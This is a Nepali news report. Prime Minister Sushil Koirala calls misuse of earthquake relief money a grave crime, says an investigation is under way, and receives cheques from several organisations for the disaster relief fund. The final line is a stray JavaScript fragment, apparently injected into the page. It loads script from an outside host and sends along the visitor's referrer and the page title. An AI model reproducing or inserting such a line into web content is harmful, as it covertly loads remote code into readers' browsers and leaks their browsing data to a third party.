प्रधानमन्त्री सुशील कोइरालाले भूकम्पपीडितका नाममा आएको राहत रकम अनियमितता गर्नु भनेको जघन्य अपराध भएको बताउनुभएको छ। भूकम्पपीडितलाई सहयोगार्थ प्रधानमन्त्री दैवीप्रकोप उद्धार कोषमा राहत रकम हस्तान्तरण गर्न बालुवाटार पुगेका विभिन्न संघ–संस्थासम्बद्ध प्रतिनिधिबाट राहत रकम ग्रहण गर्दै प्रधानमन्त्री कोइरालाले यस्तो दाबी गर्नुभएको हो। उहाले राहत रकम अनियमितताबारे सञ्चारमाध्यममा समाचार प्रकाशित÷प्रसारित भएकाले अनुसन्धान भइरहेको जानकारी दिनुभयो।
प्रधानमन्त्री कोइरालाले गोरखा भूकम्पका कारण हिमाली भेगका बाटोघाटो पहिरोले भत्काएको, पहिरो खस्नेक्रम नरोकिएको, प्रतिकूल मौसमका कारण राहत सामग्री वितरण र ढुवानीमा कठिनाइ भएकोमा दुःख व्यक्त गर्नुभयो। कार्यक्रममा यशोदा देवी भगवान सिंह केसी प्रतिष्ठानले ४ लाख, प्रदीप फस्पेट प्रालि र ज्वारल एग्रो केमिकल प्रालि भारतले २८ लाख ५० हजार भारतीय, प्रयास फाउन्डेसनले ५ लाख र नेपाल घर बहाल उपभोक्ता मञ्चले १० लाख रुपैया“बराबरको चेक प्रधानमनत्री कोइरालालाई हस्तान्तरण गरेको छ।
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;